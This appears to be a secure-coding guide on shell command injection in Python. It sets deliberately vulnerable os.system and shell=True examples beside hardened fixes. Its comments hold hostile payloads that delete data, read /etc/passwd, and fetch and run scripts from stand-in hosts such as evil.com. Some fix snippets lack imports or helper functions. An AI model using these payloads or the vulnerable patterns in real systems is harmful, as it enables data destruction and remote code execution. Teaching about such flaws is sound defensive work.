Shell Command Injection in Python

Critical Risk Command Injection
Tags: python, command-injection, subprocess, os-system, shell, rce, user-input

What it is

A critical security vulnerability where user-controlled input is passed to system shell commands through Python's subprocess, os.system(), or similar functions without proper sanitization. This allows attackers to execute arbitrary system commands on the server, potentially leading to complete system compromise, data exfiltration, or remote code execution.

import os
import sys

def process_user_file(filename):
    """Back up *filename* and print its size -- deliberately VULNERABLE demo.

    The filename is interpolated straight into shell command strings that
    are handed to ``os.system``, so any shell metacharacters it contains
    are interpreted by the shell. Do not reuse this function.
    """
    print(f"Processing file: {filename}")

    # The existence test is the only "validation"; it does nothing about
    # shell metacharacters inside the name.
    if not os.path.exists(filename):
        print("File not found")
        return

    # VULNERABLE: user input is embedded in shell command lines
    for shell_line in (
        f"cp {filename} /backup/{filename}.bak",
        f"du -h {filename}",
    ):
        os.system(shell_line)

    print("File processed successfully")

if __name__ == "__main__":
    # Script entry point: exactly one positional argument (the file to
    # process) is accepted; anything else prints usage and exits with 1.
    if len(sys.argv) == 2:
        user_filename = sys.argv[1]
        process_user_file(user_filename)
    else:
        print("Usage: script.py <filename>")
        sys.exit(1)

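# Attack examples (the payload must also name an existing path to get past
# the os.path.exists() check, e.g. a file the attacker created under that name):
# python script.py "test.txt; rm -rf /home/user; #"
# python script.py "file.txt && wget http://malicious.com/backdoor.py && python backdoor.py"
# python script.py '$(cat /etc/passwd)'  # single-quoted so the caller's shell does not expand it first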
import subprocess
import sys
import re
from pathlib import Path
from typing import Optional

def process_user_file_safe(filename: str) -> bool:
    """Back up a validated file to ``/backup`` and print its disk usage.

    The name is checked with ``is_valid_filename``,
    ``is_file_in_allowed_directory`` and ``is_safe_file_type`` before any
    external program runs. ``cp`` and ``du`` are invoked with argument
    lists (no shell), and a ``--`` separator precedes the path operands so
    a name beginning with ``-`` can never be parsed as a command option.

    Args:
        filename: Bare filename supplied by the user.

    Returns:
        True when the backup copy succeeded. False on a validation
        failure, a failed copy, a timeout, or any unexpected error; a
        message is printed in each case. A failing ``du`` only suppresses
        the size line and does not change the result.
    """
    try:
        # Validate the raw string before it is ever treated as a path
        if not is_valid_filename(filename):
            print("Error: Invalid filename format")
            return False

        filepath = Path(filename)

        # Security checks
        if not filepath.exists():
            print("Error: File not found")
            return False

        if not is_file_in_allowed_directory(filepath):
            print("Error: File not in allowed directory")
            return False

        if not is_safe_file_type(filepath):
            print("Error: File type not allowed")
            return False

        print(f"Processing file: {filename}")

        backup_dir = Path("/backup")
        backup_dir.mkdir(exist_ok=True)

        # Only the final path component is used for the backup name
        backup_path = backup_dir / f"{filepath.name}.bak"

        # SECURE: argument list (no shell); "--" ends option parsing so the
        # operands are always treated as paths, never as flags.
        result = subprocess.run(
            ['cp', '--', str(filepath), str(backup_path)],
            capture_output=True,
            text=True,
            timeout=30
        )

        if result.returncode != 0:
            print(f"Error copying file: {result.stderr}")
            return False

        # Size report is informational only
        size_result = subprocess.run(
            ['du', '-h', '--', str(filepath)],
            capture_output=True,
            text=True,
            timeout=10
        )

        if size_result.returncode == 0:
            print(f"File size: {size_result.stdout.strip()}")

        print("File processed successfully")
        return True

    except subprocess.TimeoutExpired:
        print("Error: Operation timeout")
        return False
    except Exception as e:
        # Top-level boundary of this operation: report and signal failure
        print(f"Error: {e}")
        return False

def is_valid_filename(filename: str) -> bool:
    """Return True if *filename* passes the strict filename allowlist.

    A valid name is 1-255 characters long, consists only of ASCII letters,
    digits, dots, hyphens and underscores, contains no ``..`` sequence,
    has at most two dots, and does not start with ``.`` (hidden file) or
    ``-`` (would look like a command-line option to external programs).

    Args:
        filename: Candidate filename (no directory components allowed).

    Returns:
        A real ``bool`` -- never ``None`` or a match object.
    """
    # Allowlist pattern: alphanumeric, dots, hyphens, underscores
    pattern = r'[a-zA-Z0-9._-]+'

    return bool(
        1 <= len(filename) <= 255  # Reasonable length
        # fullmatch instead of match + '$': '$' also matches just before a
        # trailing newline, which would let "name.txt\n" through.
        and re.fullmatch(pattern, filename)
        and '..' not in filename  # Prevent directory traversal
        and not filename.startswith(('.', '-'))  # No hidden files / option look-alikes
        and filename.count('.') <= 2  # Reasonable number of dots
    )

def is_file_in_allowed_directory(filepath: Path) -> bool:
    """Return True if *filepath* resolves to a location inside an allowed directory.

    The comparison is made on path components rather than on string
    prefixes, so a sibling such as ``/tmp/uploads_evil`` is not mistaken
    for ``/tmp/uploads``.

    Args:
        filepath: Path to check; it is resolved first, so symlinks and
            ``..`` segments are taken into account.

    Returns:
        True when the resolved path is one of the allowed directories or
        lies beneath one; False otherwise or when resolution fails.
    """
    allowed_dirs = [
        Path('/home/user/documents').resolve(),
        Path('/tmp/uploads').resolve(),
        Path('/var/uploads').resolve()
    ]

    try:
        resolved_path = filepath.resolve()
    except (OSError, RuntimeError):
        return False

    return any(
        resolved_path == allowed_dir or allowed_dir in resolved_path.parents
        for allowed_dir in allowed_dirs
    )

def is_safe_file_type(filepath: Path) -> bool:
    """Tell whether the file's extension is on the allowlist.

    Only the final suffix is considered, compared case-insensitively.
    """
    extension = filepath.suffix.lower()
    return extension in ('.txt', '.csv', '.json', '.xml', '.log')

if __name__ == "__main__":
    # Script entry point: one positional argument is required. The exit
    # status mirrors the result of process_user_file_safe (0 on success).
    if len(sys.argv) == 2:
        user_filename = sys.argv[1]
        success = process_user_file_safe(user_filename)
        sys.exit(0 if success else 1)
    else:
        print("Usage: script.py <filename>")
        print("Allowed file types: .txt, .csv, .json, .xml, .log")
        sys.exit(1)

💡 Why This Fix Works

The vulnerable code directly passes user input to os.system(), allowing command injection through shell metacharacters. The secure version uses subprocess with argument lists, implements comprehensive input validation, and includes proper error handling and security checks.

import subprocess
import urllib.parse

def download_url(url, output_file):
    """Fetch *url* with wget -- deliberately VULNERABLE demo.

    Both arguments are pasted into a shell command line that is run with
    ``shell=True``; a single quote inside either value breaks out of the
    quoting and lets the caller run arbitrary commands.

    Returns True when wget exits with status 0, otherwise False. Raises
    ValueError when *url* does not start with ``http``.
    """
    # VULNERABLE: a prefix test is not URL validation
    looks_like_http = url.startswith('http')
    if not looks_like_http:
        raise ValueError("URL must start with http")

    # VULNERABLE: user input embedded in a shell command string
    command = f"wget '{url}' -O '{output_file}'"

    try:
        completed = subprocess.run(
            command,
            capture_output=True,
            text=True,
            shell=True,  # Dangerous!
        )
        succeeded = completed.returncode == 0
        if succeeded:
            print(f"Downloaded {url} to {output_file}")
        else:
            print(f"Download failed: {completed.stderr}")
        return succeeded
    except Exception as e:
        print(f"Error: {e}")
        return False

# Example usage that demonstrates vulnerability:
# download_url("http://example.com/file.txt'; rm -rf /; echo '", "output.txt")
# Results in: wget 'http://example.com/file.txt'; rm -rf /; echo '' -O 'output.txt'
import subprocess
import urllib.parse
import re
from pathlib import Path
from typing import Optional

def download_url_safe(url: str, output_file: str) -> bool:
    """Download *url* to *output_file* with wget, without involving a shell.

    The URL and the output name are validated with ``is_valid_url``,
    ``is_valid_output_filename`` and ``is_safe_output_path`` first. wget is
    run with an argument list, and the URL is placed after ``--`` so it is
    always treated as an operand rather than an option.

    Args:
        url: http/https URL to fetch.
        output_file: Bare filename to write; resolved against the current
            working directory.

    Returns:
        True when wget exits with status 0. False on a validation
        failure, a failed download, a timeout, or any unexpected error. A
        partially written output file is removed after a failed or
        timed-out download.
    """
    try:
        # Comprehensive URL validation
        if not is_valid_url(url):
            print("Error: Invalid URL format")
            return False

        # Validate output filename
        if not is_valid_output_filename(output_file):
            print("Error: Invalid output filename")
            return False

        # Ensure output directory exists and is safe
        output_path = Path(output_file)
        if not is_safe_output_path(output_path):
            print("Error: Output path not allowed")
            return False

        # Create output directory if needed
        output_path.parent.mkdir(parents=True, exist_ok=True)

        print(f"Downloading {url} to {output_file}")

        try:
            # SECURE: Use subprocess with argument list (no shell)
            result = subprocess.run(
                [
                    'wget',
                    '--timeout=30',
                    '--tries=3',
                    '--max-redirect=5',
                    '--user-agent=SecureDownloader/1.0',
                    '-O',
                    str(output_path),
                    '--',  # everything after this is an operand, never an option
                    url,
                ],
                capture_output=True,
                text=True,
                timeout=60  # Overall timeout
            )
        except subprocess.TimeoutExpired:
            print("Error: Download timeout")
            # A timed-out transfer leaves a truncated file behind too
            if output_path.exists():
                output_path.unlink()
            return False

        if result.returncode == 0:
            print(f"Successfully downloaded to {output_file}")
            return True

        print(f"Download failed: {result.stderr}")
        # Clean up partial download
        if output_path.exists():
            output_path.unlink()
        return False

    except Exception as e:
        # Top-level boundary of this operation: report and signal failure
        print(f"Error: {e}")
        return False

def is_valid_url(url: str) -> bool:
    """Return True if *url* is an acceptable http/https URL.

    Checks performed: the scheme is ``http`` or ``https``, a network
    location is present, the host part (text before the first ``:`` of the
    netloc) is a dotted sequence of DNS-style labels, the URL is at most
    2048 characters, and it contains no newline, carriage return or tab.

    Args:
        url: Candidate URL string.

    Returns:
        A real ``bool`` -- never ``None`` or a match object. Any exception
        raised while parsing is treated as "invalid".
    """
    try:
        parsed = urllib.parse.urlparse(url)

        # Check scheme
        if parsed.scheme not in ('http', 'https'):
            return False

        # Check hostname
        if not parsed.netloc:
            return False

        # Basic hostname validation (anchoring is done by fullmatch below)
        hostname_pattern = r'[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?))*'
        hostname = parsed.netloc.split(':')[0]  # Remove port if present

        return bool(
            len(url) <= 2048  # Reasonable URL length
            and re.fullmatch(hostname_pattern, hostname)
            and not any(char in url for char in ('\n', '\r', '\t'))  # No control characters
        )
    except Exception:
        return False

def is_valid_output_filename(filename: str) -> bool:
    """Return True if *filename* is an acceptable output filename.

    A valid name is 1-255 characters long, consists only of ASCII letters,
    digits, dots, hyphens and underscores, contains no ``..`` sequence,
    has at most two dots, and does not start with ``.`` (hidden file) or
    ``-`` (would look like a command-line option to external programs).

    Args:
        filename: Candidate filename (no directory components allowed).

    Returns:
        A real ``bool`` -- never ``None`` or a match object.
    """
    # Allowlist pattern for safe filenames
    pattern = r'[a-zA-Z0-9._-]+'

    return bool(
        1 <= len(filename) <= 255
        # fullmatch instead of match + '$': '$' also matches just before a
        # trailing newline, which would let "name.txt\n" through.
        and re.fullmatch(pattern, filename)
        and '..' not in filename
        and not filename.startswith(('.', '-'))
        and filename.count('.') <= 2
    )

def is_safe_output_path(output_path: Path) -> bool:
    """Return True if *output_path* resolves to a location inside an allowed download directory.

    The comparison is made on path components rather than on string
    prefixes, so a sibling such as ``/tmp/downloads_evil`` is not mistaken
    for ``/tmp/downloads``.

    Args:
        output_path: Destination path; relative paths are resolved against
            the current working directory.

    Returns:
        True when the resolved path is one of the allowed directories or
        lies beneath one; False otherwise or when resolution fails.
    """
    allowed_dirs = [
        Path('/tmp/downloads').resolve(),
        Path('/home/user/downloads').resolve()
    ]

    try:
        resolved_path = output_path.resolve()
    except (OSError, RuntimeError):
        return False

    return any(
        resolved_path == allowed_dir or allowed_dir in resolved_path.parents
        for allowed_dir in allowed_dirs
    )

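# Example secure usage (run from an allowed directory such as /tmp/downloads;
# the output name must be a bare filename, so "downloads/file.txt" would be rejected):
# download_url_safe("https://example.com/file.txt", "file.txt")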

💡 Why This Fix Works

The vulnerable version uses shell=True which allows command injection through URL or filename manipulation. The secure version uses argument lists, implements comprehensive validation for URLs and filenames, and includes proper error handling and cleanup.

Why it happens

The os.system() function directly executes shell commands and is extremely dangerous when combined with user input. It passes the entire command to the system shell, allowing attackers to inject additional commands using shell metacharacters like semicolons, pipes, or command substitution.

Root causes

Unsanitized User Input in os.system()

The os.system() function directly executes shell commands and is extremely dangerous when combined with user input. It passes the entire command to the system shell, allowing attackers to inject additional commands using shell metacharacters like semicolons, pipes, or command substitution.

Preview example – PYTHON
import os

# VULNERABLE: Direct user input to os.system()
def backup_file(filename):
    """Copy *filename* into /backup/ -- deliberately VULNERABLE demo.

    The name is interpolated into a shell command line, so shell
    metacharacters in it are executed.
    """
    shell_line = f"cp {filename} /backup/"
    os.system(shell_line)

# Attack payload: filename = "test.txt; rm -rf /; #"
# Results in: cp test.txt; rm -rf /; # /backup/

Shell=True in subprocess.run() with User Input

Using subprocess with shell=True and user-controlled input creates command injection vulnerabilities. The shell=True parameter enables shell interpretation, allowing attackers to use shell metacharacters to execute additional commands or modify the intended command behavior.

Preview example – PYTHON
import subprocess

# VULNERABLE: subprocess with shell=True and user input
def ping_host(hostname):
    """Ping *hostname* once and return ping's stdout -- deliberately VULNERABLE demo.

    The hostname is interpolated into a command string executed with
    ``shell=True``, so shell metacharacters in it are executed.
    """
    shell_line = f"ping -c 1 {hostname}"
    completed = subprocess.run(
        shell_line,
        capture_output=True,
        text=True,
        shell=True,
    )
    return completed.stdout

# Attack: hostname = "google.com; cat /etc/passwd"
# Results in: ping -c 1 google.com; cat /etc/passwd

String Formatting in Command Construction

Building shell commands using string formatting (f-strings, .format(), % formatting) with user input creates injection points. Even seemingly safe operations like file operations can become dangerous when user input is incorporated into shell commands without validation.

Preview example – PYTHON
import os

# VULNERABLE: String formatting with user input
def compress_directory(directory_name):
    """Create ``<directory_name>.tar.gz`` via tar -- deliberately VULNERABLE demo.

    The directory name is formatted into a shell command line twice and
    passed to ``os.system``, so shell metacharacters in it are executed.
    """
    template = "tar -czf {}.tar.gz {}"
    os.system(template.format(directory_name, directory_name))

# Attack: directory_name = "docs; wget http://evil.com/malware.sh; bash malware.sh; #"
# Results in command injection and remote code execution

Insufficient Input Validation

Failing to properly validate and sanitize user input before using it in shell commands. This includes not checking for shell metacharacters, not validating expected formats, and not using allowlists for permitted values. Even basic validation like checking file extensions can be bypassed with clever payloads.

Preview example – PYTHON
import subprocess

# VULNERABLE: Weak validation that can be bypassed
def convert_image(filename):
    """Convert a JPG to ``output.png`` -- deliberately VULNERABLE demo.

    Raises ValueError unless *filename* ends with ``.jpg``. That suffix
    test is the only validation; the name is then interpolated into a
    command string run with ``shell=True``.
    """
    # Weak validation - only the extension is inspected
    has_jpg_suffix = filename.endswith('.jpg')
    if not has_jpg_suffix:
        raise ValueError("Only JPG files allowed")

    # Still vulnerable to injection
    shell_line = f"convert {filename} output.png"
    subprocess.call(shell_line, shell=True)

# Attack: filename = "file.jpg; rm -rf /home/user; #.jpg"

Fixes

1

Use subprocess with Argument Lists (No Shell)

The safest approach is to use subprocess functions (run, call, Popen) with argument lists instead of shell strings. When shell=False (default), subprocess passes arguments directly to the program without shell interpretation, preventing command injection attacks.

View implementation – PYTHON
import subprocess

# SECURE: Using argument list without shell
def ping_host_safe(hostname):
    """Ping *hostname* once without a shell and return ping's stdout.

    Raises ValueError when ``is_valid_hostname`` rejects the name.
    Returns the string "Ping timeout" if ping runs longer than 10 seconds.
    """
    # Reject anything that is not a well-formed hostname up front
    if not is_valid_hostname(hostname):
        raise ValueError("Invalid hostname format")

    # Argument list: the hostname is a single argv entry, never shell text
    argv = ['ping', '-c', '1', hostname]
    try:
        completed = subprocess.run(
            argv,
            timeout=10,  # Prevent hanging
            text=True,
            capture_output=True,
        )
    except subprocess.TimeoutExpired:
        return "Ping timeout"
    else:
        return completed.stdout

def is_valid_hostname(hostname):
    """Return True if *hostname* is a syntactically valid DNS hostname.

    The name must be at most 253 characters and consist of dot-separated
    labels of 1-63 characters, each made of ASCII letters, digits and
    hyphens and neither starting nor ending with a hyphen.

    Returns:
        A real ``bool`` -- never ``None`` or a match object.
    """
    import re
    # Label-by-label hostname pattern; anchoring is done by fullmatch,
    # because '$' would also match just before a trailing newline.
    pattern = r'[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?))*'
    return len(hostname) <= 253 and re.fullmatch(pattern, hostname) is not None
2

Implement Strict Input Validation and Allowlists

Create comprehensive input validation using allowlists (whitelists) rather than blocklists. Validate expected formats, restrict character sets, implement length limits, and use regular expressions for format checking. Always validate on the server side and never trust client-side validation.

View implementation – PYTHON
import re
import os
from pathlib import Path

# SECURE: Comprehensive input validation
def backup_file_safe(filename):
    """Copy a validated file into ``/backup/`` without involving a shell.

    Args:
        filename: Bare filename; must pass ``is_safe_filename`` and resolve
            to an existing file inside an allowed directory.

    Raises:
        ValueError: The name is invalid, the file does not exist, or it is
            outside the allowed directories.
        subprocess.CalledProcessError: ``cp`` exited with a non-zero status.
    """
    # Strict allowlist validation
    if not is_safe_filename(filename):
        raise ValueError("Invalid filename")

    # Verify file exists and is in allowed directory
    filepath = Path(filename)
    if not filepath.exists() or not is_in_allowed_directory(filepath):
        raise ValueError("File not found or not in allowed directory")

    # Argument list (no shell); "--" ends option parsing so a name that
    # starts with "-" is still treated as a path, never as a cp flag.
    subprocess.run(['cp', '--', str(filepath), '/backup/'], check=True)

def is_safe_filename(filename):
    """Return True if *filename* passes the strict filename allowlist.

    A valid name is at most 255 characters long, consists only of ASCII
    letters, digits, dots, hyphens and underscores, contains no ``..``
    sequence, has at most two dots, and does not start with ``.`` (hidden
    file) or ``-`` (would look like a command-line option).

    Returns:
        A real ``bool`` -- never ``None`` or a match object.
    """
    # Allowlist: alphanumeric, dots, hyphens, underscores only
    pattern = r'[a-zA-Z0-9._-]+'
    return bool(
        len(filename) <= 255  # Reasonable length limit
        # fullmatch instead of match + '$': '$' also matches just before a
        # trailing newline, which would let "name.txt\n" through.
        and re.fullmatch(pattern, filename)
        and '..' not in filename  # Prevent directory traversal
        and not filename.startswith(('.', '-'))  # No hidden files / option look-alikes
        and filename.count('.') <= 2  # Reasonable number of dots
    )

def is_in_allowed_directory(filepath):
    """Return True if *filepath* resolves to a location inside an allowed directory.

    Both the candidate and the allowed directories are resolved and then
    compared by path components, so a sibling such as
    ``/tmp/uploads_evil`` is not mistaken for ``/tmp/uploads``.

    Args:
        filepath: ``pathlib.Path`` to check.

    Returns:
        True when the resolved path is one of the allowed directories or
        lies beneath one; False otherwise or when resolution fails.
    """
    allowed_dirs = ['/home/user/documents', '/tmp/uploads']
    try:
        resolved_path = filepath.resolve()
        resolved_allowed = [Path(allowed_dir).resolve() for allowed_dir in allowed_dirs]
    except (OSError, RuntimeError):
        return False
    return any(
        resolved_path == allowed_dir or allowed_dir in resolved_path.parents
        for allowed_dir in resolved_allowed
    )
3

Use Parameterized Command Execution Libraries

Leverage libraries specifically designed for safe command execution that handle parameterization and escaping automatically. Consider using shlex.quote() for shell escaping when shell execution is absolutely necessary, though avoiding shell execution entirely is preferred.

View implementation – PYTHON
import subprocess
import shlex
from typing import List, Optional

# SECURE: Using shlex.quote when shell is necessary
def safe_shell_command(command: str, args: List[str]) -> Optional[str]:
    """Run an allowlisted command through the shell with every argument quoted.

    Args:
        command: One of ``ls``, ``cat``, ``grep`` or ``find``.
        args: Arguments; each is escaped with ``shlex.quote``.

    Returns:
        The command's captured stdout.

    Raises:
        ValueError: *command* is not on the allowlist.
        RuntimeError: The command ran longer than 30 seconds.
    """
    # NOTE(review): quoting stops shell metacharacters, but arguments are
    # still interpreted by the program itself (e.g. find's -exec).
    if command not in {'ls', 'cat', 'grep', 'find'}:
        raise ValueError(f"Command '{command}' not allowed")

    # Escape each argument so the shell sees it as one literal word
    escaped = ' '.join(map(shlex.quote, args))
    shell_line = command + " " + escaped

    try:
        completed = subprocess.run(
            shell_line,
            timeout=30,
            text=True,
            capture_output=True,
            shell=True,  # Only when absolutely necessary
        )
    except subprocess.TimeoutExpired:
        raise RuntimeError("Command timeout")
    return completed.stdout

# BETTER: Avoid shell entirely when possible
def list_directory_safe(directory: str) -> List[str]:
    """Return the lines of ``ls -la`` for *directory*, run without a shell.

    Args:
        directory: Directory path; must pass ``is_safe_directory_path``.

    Returns:
        The captured stdout of ``ls`` split into lines.

    Raises:
        ValueError: The path is rejected by ``is_safe_directory_path``.
        RuntimeError: ``ls`` ran longer than 10 seconds.
    """
    # Validate directory path
    if not is_safe_directory_path(directory):
        raise ValueError("Invalid directory path")

    try:
        result = subprocess.run(
            # No shell needed; "--" ends option parsing so the directory is
            # always an operand, even if it begins with "-".
            ['ls', '-la', '--', directory],
            capture_output=True,
            text=True,
            timeout=10
        )
        return result.stdout.splitlines()
    except subprocess.TimeoutExpired as exc:
        raise RuntimeError("Directory listing timeout") from exc
4

Implement Sandboxing and Privilege Separation

Run command execution in isolated environments with limited privileges. Use containers, chroot jails, or dedicated user accounts with minimal permissions. Implement resource limits, network restrictions, and file system access controls to minimize the impact of successful attacks.

View implementation – PYTHON
import subprocess
import pwd
import grp
import resource

# SECURE: Sandboxed command execution
def execute_sandboxed(command_args: List[str]):
    """Run *command_args* as the ``nobody`` user with resource limits applied.

    The child process drops its supplementary groups, group id and user id
    (in that order) and then lowers its CPU, address-space and process
    limits before the command is executed. It runs with a minimal
    environment and ``/tmp`` as working directory. No chroot is performed.

    Args:
        command_args: Program and arguments as a list (no shell is used).

    Returns:
        The command's captured stdout.

    Raises:
        RuntimeError: The command exceeded the 60 second timeout, or the
            sandbox could not be set up / the command could not be started
            (for example when the caller lacks the privilege to switch user).
    """
    def preexec_fn():
        # Runs in the child just before the command is executed.
        # Drop privileges to nobody user. Supplementary groups must be
        # cleared first: setgid/setuid leave them untouched, and they can
        # no longer be changed once the uid has been dropped.
        nobody_pwd = pwd.getpwnam('nobody')
        os.setgroups([])
        os.setgid(nobody_pwd.pw_gid)
        os.setuid(nobody_pwd.pw_uid)

        # Set resource limits
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))  # 30 second CPU limit
        resource.setrlimit(resource.RLIMIT_AS, (512*1024*1024, 512*1024*1024))  # 512MB memory
        resource.setrlimit(resource.RLIMIT_NPROC, (10, 10))  # Max 10 processes

    # Minimal environment for the child (this is NOT a chroot jail; the
    # process still sees the whole filesystem).
    sandbox_env = {
        'PATH': '/usr/bin:/bin',
        'HOME': '/tmp',
        'USER': 'nobody'
    }

    try:
        result = subprocess.run(
            command_args,
            preexec_fn=preexec_fn,
            env=sandbox_env,
            cwd='/tmp',
            capture_output=True,
            text=True,
            timeout=60
        )
        return result.stdout
    except subprocess.TimeoutExpired as e:
        raise RuntimeError("Sandboxed command timeout") from e
    except Exception as e:
        raise RuntimeError(f"Sandboxed execution failed: {e}") from e

Detect This Vulnerability in Your Code

Sourcery automatically identifies shell command injection in Python and many other security issues in your codebase.